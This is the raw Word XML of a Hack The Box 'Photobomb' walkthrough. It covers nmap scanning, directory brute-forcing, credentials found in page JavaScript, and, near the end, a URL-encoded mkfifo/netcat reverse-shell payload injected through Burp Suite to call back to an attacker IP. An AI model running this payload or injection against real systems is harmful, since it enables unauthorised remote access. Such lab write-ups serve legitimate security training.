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30103190"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Cover Pages"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p w14:paraId="24CCE721" w14:textId="35625756" w:rsidR="006D463C" w:rsidRDefault="006D46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CB9542" wp14:editId="1429EE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0E45AD" w14:textId="1F771829" w:rsidR="006D463C" w:rsidRDefault="00240A7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SYSTEM HACKING ON</w:t>
                                    </w:r>
                                    <w:r w:rsidR="00BA5DD8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HACK THE BOX </w:t>
                                    </w:r>
                                    <w:r w:rsidR="00BA5DD8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MACHINE PHOTOBO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C10F65" w14:textId="0B7544A7" w:rsidR="006D463C" w:rsidRDefault="00BA5DD8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ANJAN SHRESTHA</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="2CD76035" w14:textId="49EFE273" w:rsidR="00BA5DD8" w:rsidRDefault="00BA5DD8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2022/2/10</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="5D789179" w14:textId="1CD4E43E" w:rsidR="006D463C" w:rsidRDefault="006D463C">
                                  <w:pPr>
                                    <w:pStyle w:val="NoSpacing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CB9542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70E45AD" w14:textId="1F771829" w:rsidR="006D463C" w:rsidRDefault="00240A7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SYSTEM HACKING ON</w:t>
                              </w:r>
                              <w:r w:rsidR="00BA5DD8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HACK THE BOX </w:t>
                              </w:r>
                              <w:r w:rsidR="00BA5DD8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MACHINE PHOTOBOMB</w:t>
                              </w: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64C10F65" w14:textId="0B7544A7" w:rsidR="006D463C" w:rsidRDefault="00BA5DD8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ANJAN SHRESTHA</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2CD76035" w14:textId="49EFE273" w:rsidR="00BA5DD8" w:rsidRDefault="00BA5DD8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2022/2/10</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5D789179" w14:textId="1CD4E43E" w:rsidR="006D463C" w:rsidRDefault="006D463C">
                            <w:pPr>
                              <w:pStyle w:val="NoSpacing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4C49286" w14:textId="682586DC" w:rsidR="00BA5DD8" w:rsidRDefault="006D463C">
          <w:r>
            <w:br w:type="page"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="0878E3B8" w14:textId="5834044F" w:rsidR="00437584" w:rsidRDefault="00FD6328" w:rsidP="00FD6328">
          <w:pPr>
            <w:pStyle w:val="ListParagraph"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="1"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:lastRenderedPageBreak/>
            <w:t>V</w:t>
          </w:r>
          <w:r w:rsidR="00437584">
            <w:t>ictim machine(photobomb)</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="02B38E4D" w14:textId="6B5A0455" w:rsidR="00BA5DD8" w:rsidRDefault="00BA5DD8">
          <w:r>
            <w:t xml:space="preserve">Scanning this machine with nmap for open ports and system version and many more other need information about system and its </w:t>
          </w:r>
          <w:r w:rsidR="00453595">
            <w:t>versions. Victim</w:t>
          </w:r>
          <w:r>
            <w:t xml:space="preserve"> machine </w:t>
          </w:r>
          <w:r w:rsidR="00453595">
            <w:t>IP (</w:t>
          </w:r>
          <w:r>
            <w:t>10.10.11.182)</w:t>
          </w:r>
          <w:r w:rsidR="002E5871">
            <w:t xml:space="preserve"> and this machine 80 port is open so that is website</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7A1219E1" w14:textId="5BFAD8CB" w:rsidR="00BA5DD8" w:rsidRDefault="00BA5DD8">
          <w:r>
            <w:t>Command: nmap  -A  10.10.11.182</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1A21C2E7" w14:textId="36E6AA5F" w:rsidR="006D463C" w:rsidRDefault="006D463C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37FC6C3F" wp14:editId="532FAC71">
                <wp:extent cx="5943600" cy="5157470"/>
                <wp:effectExtent l="0" t="0" r="0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15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F6A09D" w14:textId="778AB4E7" w:rsidR="006D463C" w:rsidRDefault="006D463C">
          <w:pPr>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="24F5FA14" w14:textId="0B87A869" w:rsidR="006D463C" w:rsidRDefault="006D463C">
          <w:pPr>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="6E548122" w14:textId="1F4AF96E" w:rsidR="006D463C" w:rsidRDefault="006D463C">
          <w:pPr>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="2E71CE47" w14:textId="77652CE2" w:rsidR="00BA5DD8" w:rsidRDefault="00BA5DD8">
          <w:pPr>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="7F77CB9D" w14:textId="77777777" w:rsidR="00453595" w:rsidRDefault="00453595">
          <w:pPr>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="1DF13C6C" w14:textId="4AA7BE72" w:rsidR="00BA5DD8" w:rsidRDefault="00BA5DD8">
          <w:pPr>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="7D72358D" w14:textId="2C69CF48" w:rsidR="00453595" w:rsidRDefault="00453595" w:rsidP="00453595">
          <w:pPr>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:t>PASSIVE</w:t>
          </w:r>
          <w:r w:rsidRPr="00453595">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve">FOOTPRINTING </w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="5F66577D" w14:textId="217D5C95" w:rsidR="00453595" w:rsidRDefault="00453595">
          <w:pPr>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="4686CCF7" w14:textId="5601D279" w:rsidR="00BA5DD8" w:rsidRDefault="00BA5DD8">
          <w:pPr>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>1 OpenSHH 8.2P1</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1EF457A2" w14:textId="30E65C3C" w:rsidR="00BA5DD8" w:rsidRDefault="00BA5DD8">
          <w:pPr>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>Gathering information for checking wherther this version has any kind of vulnabilities</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="620663E7" w14:textId="0EF64EBB" w:rsidR="006D463C" w:rsidRDefault="006D463C">
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43FA7CF1" wp14:editId="11074F8B">
                <wp:extent cx="5943600" cy="1576070"/>
                <wp:effectExtent l="0" t="0" r="0" b="508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j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57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370838" w14:textId="1CC08D38" w:rsidR="006D463C" w:rsidRDefault="00BA5DD8">
          <w:r>
            <w:t>Getting exploit command while Gthering the information</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0DAB3E32" w14:textId="62EFE750" w:rsidR="006D463C" w:rsidRDefault="006D463C">
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2889CA12" wp14:editId="50AB4082">
                <wp:extent cx="5943600" cy="435292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k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35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DC3243" w14:textId="69DFBA67" w:rsidR="006D463C" w:rsidRDefault="006D463C"/>
        <w:p w14:paraId="60A4BC6C" w14:textId="77777777" w:rsidR="002E5871" w:rsidRDefault="002E5871"/>
        <w:p w14:paraId="0B31C7C1" w14:textId="77777777" w:rsidR="002E5871" w:rsidRDefault="002E5871"/>
        <w:p w14:paraId="46FEEA8B" w14:textId="2ADD69D5" w:rsidR="006D463C" w:rsidRDefault="00BA5DD8">
          <w:r>
            <w:t>2 nginx</w:t>
          </w:r>
          <w:r w:rsidR="00C66CA1">
            <w:t xml:space="preserve"> 1.18.0</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="31A1C24E" w14:textId="77777777" w:rsidR="00C66CA1" w:rsidRDefault="00C66CA1" w:rsidP="00C66CA1">
          <w:pPr>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>Gathering information for checking wherther this version has any kind of vulnabilities</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="53B38A5E" w14:textId="77777777" w:rsidR="00C66CA1" w:rsidRDefault="00C66CA1"/>
        <w:p w14:paraId="2B328524" w14:textId="77777777" w:rsidR="002E5871" w:rsidRDefault="006D463C">
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F4B77B1" wp14:editId="24AE5715">
                <wp:extent cx="5943600" cy="2032635"/>
                <wp:effectExtent l="0" t="0" r="0" b="571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032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4E10AE" w14:textId="77777777" w:rsidR="002E5871" w:rsidRDefault="002E5871"/>
        <w:p w14:paraId="77CF20A9" w14:textId="77777777" w:rsidR="002E5871" w:rsidRDefault="002E5871"/>
        <w:p w14:paraId="049966A5" w14:textId="77777777" w:rsidR="002E5871" w:rsidRDefault="002E5871"/>
        <w:p w14:paraId="7E6B94FA" w14:textId="77777777" w:rsidR="002E5871" w:rsidRDefault="002E5871"/>
        <w:p w14:paraId="14410CEF" w14:textId="77777777" w:rsidR="002E5871" w:rsidRDefault="002E5871"/>
        <w:p w14:paraId="1075678F" w14:textId="77777777" w:rsidR="002E5871" w:rsidRDefault="002E5871"/>
        <w:p w14:paraId="79CA4175" w14:textId="77777777" w:rsidR="002E5871" w:rsidRDefault="002E5871"/>
        <w:p w14:paraId="6B429B92" w14:textId="77777777" w:rsidR="002E5871" w:rsidRDefault="002E5871"/>
        <w:p w14:paraId="27C6A70A" w14:textId="77777777" w:rsidR="002E5871" w:rsidRDefault="002E5871"/>
        <w:p w14:paraId="0D0BF06D" w14:textId="77777777" w:rsidR="002E5871" w:rsidRDefault="002E5871"/>
        <w:p w14:paraId="64308C2C" w14:textId="77777777" w:rsidR="002E5871" w:rsidRDefault="002E5871"/>
        <w:p w14:paraId="4E842F63" w14:textId="77777777" w:rsidR="002E5871" w:rsidRDefault="002E5871"/>
        <w:p w14:paraId="5CE6F38F" w14:textId="77777777" w:rsidR="002E5871" w:rsidRDefault="002E5871"/>
        <w:p w14:paraId="4FD00B6E" w14:textId="77777777" w:rsidR="002E5871" w:rsidRDefault="002E5871"/>
        <w:p w14:paraId="473F4A44" w14:textId="77777777" w:rsidR="002E5871" w:rsidRDefault="002E5871"/>
        <w:p w14:paraId="3CF671B0" w14:textId="77777777" w:rsidR="002E5871" w:rsidRDefault="002E5871"/>
        <w:p w14:paraId="6819D9FB" w14:textId="77777777" w:rsidR="002E5871" w:rsidRDefault="002E5871"/>
        <w:p w14:paraId="36089634" w14:textId="60DFFA03" w:rsidR="00403D00" w:rsidRDefault="002E5871">
          <w:r>
            <w:lastRenderedPageBreak/>
            <w:t>Directly victim machine IP address was not open. While doing scanning with nmap this victim machine was a website which use 80 port which was open.</w:t>
          </w:r>
          <w:r w:rsidR="00403D00">
            <w:t xml:space="preserve">so that in kali terminal; opened nano text editor and add  </w:t>
          </w:r>
          <w:r w:rsidR="00437584">
            <w:t>victim</w:t>
          </w:r>
          <w:r w:rsidR="00403D00">
            <w:t xml:space="preserve"> IP  in kali host</w:t>
          </w:r>
          <w:r w:rsidR="00FF5224">
            <w:t>(attacker machine)</w:t>
          </w:r>
          <w:r w:rsidR="00403D00">
            <w:t xml:space="preserve">  so that this victim IP will be open.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6027B14D" w14:textId="44338671" w:rsidR="006D463C" w:rsidRDefault="00FF5224">
          <w:r>
            <w:t>Command: nano /etc/hosts</w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="708600D6" w14:textId="3AC3B9CA" w:rsidR="00FF5224" w:rsidRDefault="006D463C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D128DBB" wp14:editId="66D691B2">
            <wp:extent cx="5943600" cy="5059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D896" w14:textId="77777777" w:rsidR="00437584" w:rsidRDefault="00437584"/>
    <w:p w14:paraId="774AE1C1" w14:textId="0EC3A7D2" w:rsidR="00FF5224" w:rsidRDefault="00FF5224"/>
    <w:p w14:paraId="0309DCC3" w14:textId="2C66E488" w:rsidR="00FF5224" w:rsidRDefault="00FF5224"/>
    <w:p w14:paraId="0259F806" w14:textId="508CB4A7" w:rsidR="00FF5224" w:rsidRDefault="00FF5224"/>
    <w:p w14:paraId="40FB4688" w14:textId="02CDB46A" w:rsidR="00FF5224" w:rsidRDefault="00FF5224"/>
    <w:p w14:paraId="67D3D5E5" w14:textId="47A95CF3" w:rsidR="00FF5224" w:rsidRDefault="00FF5224"/>
    <w:p w14:paraId="475FA181" w14:textId="77777777" w:rsidR="00437584" w:rsidRDefault="00437584"/>
    <w:p w14:paraId="53D1D64A" w14:textId="285EB46B" w:rsidR="00FF5224" w:rsidRDefault="00FF5224">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Adding this victim ip  in kali hosts(attacker Machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608EC114" w14:textId="77777777" w:rsidR="00453595" w:rsidRDefault="00437584">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="240A99B5" wp14:editId="4A6CB6B0">
            <wp:extent cx="5943600" cy="5172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AC7A" w14:textId="77777777" w:rsidR="00453595" w:rsidRDefault="00453595"/>
    <w:p w14:paraId="572179B9" w14:textId="77777777" w:rsidR="00453595" w:rsidRDefault="00453595"/>
    <w:p w14:paraId="662F5B09" w14:textId="77777777" w:rsidR="00453595" w:rsidRDefault="00453595"/>
    <w:p w14:paraId="2616E512" w14:textId="77777777" w:rsidR="00453595" w:rsidRDefault="00453595"/>
    <w:p w14:paraId="6799EF29" w14:textId="77777777" w:rsidR="00453595" w:rsidRDefault="00453595"/>
    <w:p w14:paraId="12FE74DB" w14:textId="77777777" w:rsidR="00453595" w:rsidRDefault="00453595"/>
    <w:p w14:paraId="1151C6F3" w14:textId="77777777" w:rsidR="00453595" w:rsidRDefault="00453595"/>
    <w:p w14:paraId="7852E10D" w14:textId="77777777" w:rsidR="00453595" w:rsidRDefault="00453595"/>
    <w:p w14:paraId="2D0AE7AE" w14:textId="77777777" w:rsidR="00453595" w:rsidRDefault="00453595"/>
    <w:p w14:paraId="543C3A6C" w14:textId="1E909E05" w:rsidR="00437584" w:rsidRDefault="00437584">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>open IP of victim machine(photobomb)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4299E192" w14:textId="77777777" w:rsidR="00FD6328" w:rsidRDefault="006D463C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F834D2E" wp14:editId="6E148280">
            <wp:extent cx="5943600" cy="2724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4C34" w14:textId="470D1535" w:rsidR="006D463C" w:rsidRDefault="00FD6328">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Using dirbuster for searching hidden folder and  url of victim machine to collection information to login  in the system  by any method.</w:t>
      </w:r>
      <w:r w:rsidR="006D463C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DABA0BA" wp14:editId="4B8831E7">
            <wp:extent cx="5943600" cy="5107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8019" w14:textId="278623DD" w:rsidR="00FD6328" w:rsidRDefault="00FD6328"/>
    <w:p w14:paraId="601A9486" w14:textId="76C0BE34" w:rsidR="00FD6328" w:rsidRDefault="00FD6328"/>
    <w:p w14:paraId="5B4DD5D0" w14:textId="54106F64" w:rsidR="00FD6328" w:rsidRDefault="00FD6328"/>
    <w:p w14:paraId="158E3F93" w14:textId="0D29A1A1" w:rsidR="00FD6328" w:rsidRDefault="00FD6328"/>
    <w:p w14:paraId="112A4BF2" w14:textId="1EB04E12" w:rsidR="00FD6328" w:rsidRDefault="00FD6328"/>
    <w:p w14:paraId="6CAFC321" w14:textId="2DDDCAD7" w:rsidR="00FD6328" w:rsidRDefault="00FD6328"/>
    <w:p w14:paraId="30BB6BB4" w14:textId="211FAAD0" w:rsidR="00FD6328" w:rsidRDefault="00FD6328"/>
    <w:p w14:paraId="56E8BFE8" w14:textId="3A171906" w:rsidR="00FD6328" w:rsidRDefault="00FD6328"/>
    <w:p w14:paraId="62FA2202" w14:textId="0647C302" w:rsidR="00FD6328" w:rsidRDefault="00FD6328">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Insterting target URL of victim machine </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00F47138">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://photobomb.htb/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> and selecting  text for burte force attack on this victim machine (directory: home/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DC38FD" w14:textId="0D6BA9DC" w:rsidR="006D463C" w:rsidRDefault="006D463C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41A1304C" wp14:editId="5FC6ADAC">
            <wp:extent cx="5829805" cy="420660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F2C6" w14:textId="77777777" w:rsidR="00453595" w:rsidRDefault="00453595" w:rsidP="00FD6328"/>
    <w:p w14:paraId="131E68C8" w14:textId="77777777" w:rsidR="00453595" w:rsidRDefault="00453595" w:rsidP="00FD6328"/>
    <w:p w14:paraId="5BAE1A70" w14:textId="77777777" w:rsidR="00453595" w:rsidRDefault="00453595" w:rsidP="00FD6328"/>
    <w:p w14:paraId="478FFCCC" w14:textId="77777777" w:rsidR="00453595" w:rsidRDefault="00453595" w:rsidP="00FD6328"/>
    <w:p w14:paraId="6F815976" w14:textId="77777777" w:rsidR="00453595" w:rsidRDefault="00453595" w:rsidP="00FD6328"/>
    <w:p w14:paraId="72931964" w14:textId="77777777" w:rsidR="00453595" w:rsidRDefault="00453595" w:rsidP="00FD6328"/>
    <w:p w14:paraId="4FC19615" w14:textId="77777777" w:rsidR="00453595" w:rsidRDefault="00453595" w:rsidP="00FD6328"/>
    <w:p w14:paraId="476DB4C5" w14:textId="77777777" w:rsidR="00453595" w:rsidRDefault="00453595" w:rsidP="00FD6328"/>
    <w:p w14:paraId="23959376" w14:textId="77777777" w:rsidR="00453595" w:rsidRDefault="00453595" w:rsidP="00FD6328"/>
    <w:p w14:paraId="0794EDDF" w14:textId="77777777" w:rsidR="00453595" w:rsidRDefault="00453595" w:rsidP="00FD6328"/>
    <w:p w14:paraId="0C417356" w14:textId="77777777" w:rsidR="00453595" w:rsidRDefault="00453595" w:rsidP="00FD6328"/>
    <w:p w14:paraId="7FF09745" w14:textId="77777777" w:rsidR="00453595" w:rsidRDefault="00453595" w:rsidP="00FD6328"/>
    <w:p w14:paraId="7ABDA8B5" w14:textId="061A17F1" w:rsidR="00FD6328" w:rsidRDefault="00FD6328">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="00C85916">
        <w:t>UMBER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OF THREADS :80 and click on start to the process will run properly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AFA7B6" w14:textId="5F9807CF" w:rsidR="006D463C" w:rsidRDefault="006D463C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DE09EAA" wp14:editId="4D339435">
            <wp:extent cx="5883150" cy="4145639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743A" w14:textId="0327C1B8" w:rsidR="00616FA8" w:rsidRDefault="00616FA8"/>
    <w:p w14:paraId="273F71DB" w14:textId="47FFB960" w:rsidR="00616FA8" w:rsidRDefault="00616FA8"/>
    <w:p w14:paraId="3877680D" w14:textId="57DF7BD6" w:rsidR="00616FA8" w:rsidRDefault="00616FA8"/>
    <w:p w14:paraId="339E94AA" w14:textId="65BA0204" w:rsidR="00616FA8" w:rsidRDefault="00616FA8"/>
    <w:p w14:paraId="2BEC3F80" w14:textId="214CE87E" w:rsidR="00616FA8" w:rsidRDefault="00616FA8"/>
    <w:p w14:paraId="1E7FFF32" w14:textId="2F6DD757" w:rsidR="00616FA8" w:rsidRDefault="00616FA8"/>
    <w:p w14:paraId="23EAE499" w14:textId="055079B5" w:rsidR="00616FA8" w:rsidRDefault="00616FA8"/>
    <w:p w14:paraId="7B59CA19" w14:textId="3EAB2DDF" w:rsidR="00616FA8" w:rsidRDefault="00616FA8"/>
    <w:p w14:paraId="480BA98A" w14:textId="0273F1B2" w:rsidR="00616FA8" w:rsidRDefault="00616FA8"/>
    <w:p w14:paraId="350BF5FB" w14:textId="26E8807E" w:rsidR="00616FA8" w:rsidRDefault="00616FA8"/>
    <w:p w14:paraId="4096383E" w14:textId="5DF86D86" w:rsidR="00616FA8" w:rsidRDefault="00616FA8"/>
    <w:p w14:paraId="7CD9A3A0" w14:textId="44671EBF" w:rsidR="00616FA8" w:rsidRDefault="00616FA8"/>
    <w:p w14:paraId="6D28D780" w14:textId="32152163" w:rsidR="006D463C" w:rsidRDefault="00616FA8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">After process is ongoing ,getting that the victim machine has a javascript code in the url so that it may be </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>vulnalbe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for the system cardinal information for login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A614E84" w14:textId="6FAEAC94" w:rsidR="006D463C" w:rsidRDefault="006D463C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0262794A" wp14:editId="16D3C132">
            <wp:extent cx="5875529" cy="414563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8CE6" w14:textId="246D1305" w:rsidR="00C85916" w:rsidRDefault="00C85916"/>
    <w:p w14:paraId="077F7AE4" w14:textId="409A28A9" w:rsidR="00C85916" w:rsidRDefault="00C85916"/>
    <w:p w14:paraId="7516BF32" w14:textId="04B1DF46" w:rsidR="00C85916" w:rsidRDefault="00C85916"/>
    <w:p w14:paraId="36CF2884" w14:textId="4452309C" w:rsidR="00C85916" w:rsidRDefault="00C85916"/>
    <w:p w14:paraId="201FB6A7" w14:textId="7BAEE04F" w:rsidR="00C85916" w:rsidRDefault="00C85916"/>
    <w:p w14:paraId="7EE02703" w14:textId="7845A914" w:rsidR="00C85916" w:rsidRDefault="00C85916"/>
    <w:p w14:paraId="2374625F" w14:textId="42EEA4F6" w:rsidR="00C85916" w:rsidRDefault="00C85916"/>
    <w:p w14:paraId="583B5206" w14:textId="76C69627" w:rsidR="00C85916" w:rsidRDefault="00C85916"/>
    <w:p w14:paraId="3B7B5E8A" w14:textId="06E69E17" w:rsidR="00C85916" w:rsidRDefault="00C85916"/>
    <w:p w14:paraId="584B968B" w14:textId="66DB498E" w:rsidR="00C85916" w:rsidRDefault="00C85916"/>
    <w:p w14:paraId="05A1BE7B" w14:textId="29152BC2" w:rsidR="00C85916" w:rsidRDefault="00C85916"/>
    <w:p w14:paraId="2C3C785C" w14:textId="77777777" w:rsidR="00C85916" w:rsidRDefault="00C85916"/>
    <w:p w14:paraId="5921F96E" w14:textId="67C92AE9" w:rsidR="00616FA8" w:rsidRDefault="00616FA8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>JAVASCRIPT CODE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B80109A" w14:textId="1EBC0607" w:rsidR="00616FA8" w:rsidRDefault="00616FA8">
      <w:r>
        <w:t>Finding credential information i.e  username and password for the login page for login and other information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53983AC1" w14:textId="7A21B665" w:rsidR="00616FA8" w:rsidRDefault="00616FA8">
      <w:r>
        <w:t>Username: pH0t0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D428814" w14:textId="51CC2BC9" w:rsidR="00616FA8" w:rsidRDefault="00616FA8">
      <w:r>
        <w:t>Password: b0mb!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A228C40" w14:textId="6A6B3137" w:rsidR="006D463C" w:rsidRDefault="006D463C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D4BED23" wp14:editId="3757FE1A">
            <wp:extent cx="5943600" cy="1135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AB3D" w14:textId="456F7328" w:rsidR="00616FA8" w:rsidRDefault="00A252BD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CCEC679" wp14:editId="6D07204F">
            <wp:extent cx="5943600" cy="2941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563D" w14:textId="1B1709B1" w:rsidR="0032030F" w:rsidRDefault="00453595">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Successfully</w:t>
      </w:r>
      <w:r w:rsidR="00616FA8">
        <w:t xml:space="preserve"> login in this machine .so can be download image easily without any permission.</w:t>
      </w:r>
      <w:r w:rsidR="006D463C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C57447F" wp14:editId="0550AC6B">
            <wp:extent cx="5943600" cy="2733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93AE" w14:textId="4BBD65E2" w:rsidR="00A252BD" w:rsidRDefault="00A252BD"/>
    <w:p w14:paraId="7B884D25" w14:textId="5651AA69" w:rsidR="005310AA" w:rsidRDefault="005310AA"/>
    <w:p w14:paraId="27D841A5" w14:textId="2E5B2B3D" w:rsidR="00AE6769" w:rsidRDefault="00F3080D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FF1FBEB" wp14:editId="1D293B19">
            <wp:extent cx="5943600" cy="39160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6E9F" w14:textId="2712C98B" w:rsidR="00AE6769" w:rsidRPr="00AE6769" w:rsidRDefault="00AE6769" w:rsidP="00AE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Reverse shell </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE6769">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Cbash%20-i%202%3E%261%7Cnc%20%2010.10.16.15%20%20443%20%3E%2Ftmp%2Ff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9683E5" w14:textId="77777777" w:rsidR="00AE6769" w:rsidRDefault="00AE6769"/>
    <w:p w14:paraId="06FE788C" w14:textId="2C111ED3" w:rsidR="00F3080D" w:rsidRDefault="00F3080D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C61328B" wp14:editId="3D9F697B">
            <wp:extent cx="5943600" cy="3154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C7C1" w14:textId="16CA9A89" w:rsidR="00F3080D" w:rsidRDefault="00F3080D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FBC3E39" wp14:editId="4428C2D1">
            <wp:extent cx="5943600" cy="35744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46B8" w14:textId="4B4B1419" w:rsidR="00AE6769" w:rsidRDefault="00AE6769">
      <w:r>
        <w:t>Injecting reverse shell code in brupsite by intercepting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5335073B" w14:textId="0DB5800F" w:rsidR="005310AA" w:rsidRDefault="00F3080D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="066E52B5" wp14:editId="0460B968">
            <wp:extent cx="5943600" cy="28740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D396" w14:textId="3EFAA39B" w:rsidR="005310AA" w:rsidRDefault="005310AA"/>
    <w:p w14:paraId="6B72DEED" w14:textId="1A4EE7A3" w:rsidR="005310AA" w:rsidRDefault="005310AA"/>
    <w:p w14:paraId="601928E9" w14:textId="40436489" w:rsidR="00AE6769" w:rsidRDefault="00AE6769"/>
